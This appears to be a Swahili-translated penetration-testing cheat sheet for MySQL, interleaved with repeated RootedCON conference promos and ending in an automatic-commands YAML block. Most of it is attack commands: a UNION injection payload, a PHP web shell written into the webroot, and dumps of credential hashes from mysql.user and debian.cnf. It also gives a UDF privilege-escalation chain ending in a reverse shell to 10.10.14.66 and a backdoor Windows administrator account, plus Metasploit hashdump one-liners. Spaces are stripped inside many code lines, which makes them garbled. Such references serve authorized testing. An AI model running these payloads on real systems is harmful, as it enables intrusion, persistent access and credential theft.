RootedCON ni tukio muhimu zaidi la usalama wa mtandao nchini Hispania na moja ya muhimu zaidi barani Ulaya. Kwa malengo ya kukuza maarifa ya kiufundi, kongamano hili ni mahali pa kukutana kwa wataalamu wa teknolojia na usalama wa mtandao katika kila nidhamu.
MySQL inaweza kuelezwa kama Mfumo wa Usimamizi wa Takwimu wa Uhusiano (RDBMS) wa chanzo wazi ambao upatikana bila malipo. Inafanya kazi kwenye Lugha ya Utafutaji Iliyopangwa (SQL), ikiruhusu usimamizi na upangaji wa maktaba za takwimu.
Bandari ya chaguo: 3306
3306/tcp open mysql
Kuunganisha
Mitaani
mysql-uroot# Connect to root without passwordmysql-uroot-p# A password will be asked (check someone)
showdatabases;use<database>;connect<database>;showtables;describe<table_name>;showcolumnsfrom<table>;select version(); #versionselect @@version(); #versionselect user(); #Userselect database(); #database name#Get a shell with the mysql client user\!sh#Basic MySQLiUnionSelect1,2,3,4,group_concat(0x7c,table_name,0x7C) frominformation_schema.tablesUnionSelect1,2,3,4,column_namefrominformation_schema.columnswheretable_name="<TABLE NAME>"#Read & Write## Yo need FILE privilege to read & write to files.select load_file('/var/lib/mysql-files/key.txt'); #Read fileselect 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'#Try to change MySQL root passwordUPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root';FLUSH PRIVILEGES;quit;
mysql-uusername-p<manycommands.sql#A file with all the commands you want to executemysql-uroot-h127.0.0.1-e'show databases;'
Uchambuzi wa Ruhusa za MySQL
#MysqlSHOW GRANTS [FOR user];SHOW GRANTS;SHOW GRANTS FOR'root'@'localhost';SHOW GRANTS FORCURRENT_USER();# Get users, permissions & hashesSELECT*FROM mysql.user;#From DBselect*from mysql.user where user='root';## Get users with file_privselect user,file_priv from mysql.user where file_priv='Y';## Get users with Super_privselect user,Super_priv from mysql.user where Super_priv='Y';# List functionsSELECT routine_name FROM information_schema.routines WHERE routine_type ='FUNCTION';#@ Functions notfrom sys. dbSELECT routine_name FROM information_schema.routines WHERE routine_type ='FUNCTION'AND routine_schema!='sys';
Kwa kweli, unapojaribu kupakia data za ndani kwenye mezamaudhui ya faili kwenye seva ya MySQL au MariaDB inamuuliza mteja asome na kutuma maudhui. Kisha, ikiwa unaweza kuhariri mteja wa mysql kuunganisha kwenye seva yako ya MySQL, unaweza kusoma faili yoyote.
Tafadhali kumbuka kuwa hii ndio tabia inayotumika:
(Kumbuka neno "local")
Kwa sababu bila "local" unaweza kupata:
mysql>loaddatainfile"/etc/passwd"intotabletestFIELDSTERMINATEDBY'\n';ERROR1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
RootedCON ni tukio muhimu zaidi la usalama wa mtandao nchini Hispania na moja ya muhimu zaidi barani Ulaya. Kwa ** lengo la kukuza maarifa ya kiufundi**, kongamano hili ni mahali pa mkutano wa joto kwa wataalamu wa teknolojia na usalama wa mtandao katika kila nidhamu.
Katika usanidi wa huduma za MySQL, mipangilio mbalimbali hutumiwa kufafanua uendeshaji wake na hatua za usalama:
Mipangilio ya user hutumiwa kuteua mtumiaji ambaye huduma ya MySQL itatekelezwa chini yake.
password hutumika kuweka nenosiri linalohusishwa na mtumiaji wa MySQL.
admin_address inabainisha anwani ya IP inayosikiliza kwa ajili ya mawasiliano ya TCP/IP kwenye interface ya mtandao wa utawala.
Kipengele cha debug kinaonyesha mipangilio ya sasa ya upelelezi, ikiwa ni pamoja na taarifa nyeti ndani ya magogo.
sql_warnings inasimamia ikiwa vifungu vya taarifa vinazalishwa kwa taarifa za kuingiza safu moja wakati onyo linatokea, likiwa na data nyeti ndani ya magogo.
Kwa secure_file_priv, wigo wa uingizaji na kuuza data unazuiliwa ili kuboresha usalama.
Kupandisha Hadhi ya Mamlaka
# Get current user (an all users) privileges and hashesusemysql;select user();select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user;# Get users, permissions & credsSELECT*FROMmysql.user;mysql-uroot--password=<PASSWORD>-e"SELECT * FROM mysql.user;"# Create user and give privilegescreateusertestidentifiedby'test';grantSELECT,CREATE,DROP,UPDATE,DELETE,INSERTon*.*tomysqlidentifiedby'mysql'WITHGRANTOPTION;# Get a shell (with your permissions, usefull for sudo/suid privesc)\!sh
Kupanda Mamlaka kupitia maktaba
Ikiwa seva ya mysql inaendeshwa kama root (au mtumiaji mwingine aliye na mamlaka zaidi) unaweza kufanya iendekeze amri. Kwa hili, unahitaji kutumia kazi zilizoundwa na mtumiaji. Na ili kuunda kazi iliyoundwa na mtumiaji utahitaji maktaba kwa OS inayoendesha mysql.
Maktaba mbaya ya kutumia inaweza kupatikana ndani ya sqlmap na ndani ya metasploit kwa kufanya locate "*lib_mysqludf_sys*". Faili za .so ni maktaba za linux na .dll ni zile za Windows, chagua ile unayohitaji.
Ikiwa huna maktaba hizo, unaweza kuzitafuta, au pakua hii msimbo wa C wa linux na kuutengeneza ndani ya mashine ya linux yenye kasoro.
Sasa kwamba una maktaba, ingia ndani ya Mysql kama mtumiaji aliye na mamlaka (root?) na fuata hatua zifuatazo:
Linux
# Use a databaseuse mysql;# Create a tabletoload the library andmove it to the plugins dircreatetablenpn(line blob);# Load the binary library inside the table## You might need to change the pathandfilenameinsert into npn values(load_file('/tmp/lib_mysqludf_sys.so'));# Get the plugin_dir pathshow variables like'%plugin%';# Supposing the plugin dir was /usr/lib/x86_64-linux-gnu/mariadb19/plugin/# dumpin there the libraryselect*from npn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys.so';# Create a functiontoexecute commandscreatefunctionsys_execreturnsinteger soname 'lib_mysqludf_sys.so';# Execute commandsselect sys_exec('id > /tmp/out.txt; chmod 777 /tmp/out.txt');select sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"');
Windows
# CHech the linux comments for more indicationsUSE mysql;CREATETABLEnpn(line blob);INSERT INTO npn values(load_file('C://temp//lib_mysqludf_sys.dll'));show variables like'%plugin%';SELECT*FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';CREATEFUNCTIONsys_execRETURNSinteger SONAME 'lib_mysqludf_sys_32.dll';SELECT sys_exec("net user npn npn12345678 /add");SELECT sys_exec("net localgroup Administrators npn /add");
Kupata siri za MySQL kutoka kwenye faili
Ndani ya /etc/mysql/debian.cnf unaweza kupata nywila ya maandishi ya wazi ya mtumiaji debian-sys-maint
cat/etc/mysql/debian.cnf
Unaweza kutumia sifa hizi kuingia kwenye database ya mysql.
Ndani ya faili: /var/lib/mysql/mysql/user.MYD unaweza kupata mishale yote ya watumiaji wa MySQL (zile unazoweza kuchimba kutoka mysql.user ndani ya database).
Protocol_Name: MySql #Protocol Abbreviation if there is one.
Port_Number: 3306 #Comma separated if there is more than one.
Protocol_Description: MySql #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for MySql
Note: |
MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL).
https://book.hacktricks.xyz/pentesting/pentesting-mysql
Entry_2:
Name: Nmap
Description: Nmap with MySql Scripts
Command: nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse {IP} -p 3306
Entry_3:
Name: MySql
Description: Attempt to connect to mysql server
Command: mysql -h {IP} -u {Username}@localhost
Entry_4:
Name: MySql consolesless mfs enumeration
Description: MySql enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit'
RootedCON ni tukio muhimu zaidi la usalama wa mtandao nchini Hispania na moja ya muhimu zaidi barani Ulaya. Na malengo ya kukuza maarifa ya kiufundi, kongamano hili ni mahali pa kukutana kwa wataalamu wa teknolojia na usalama wa mtandao katika kila nidhamu.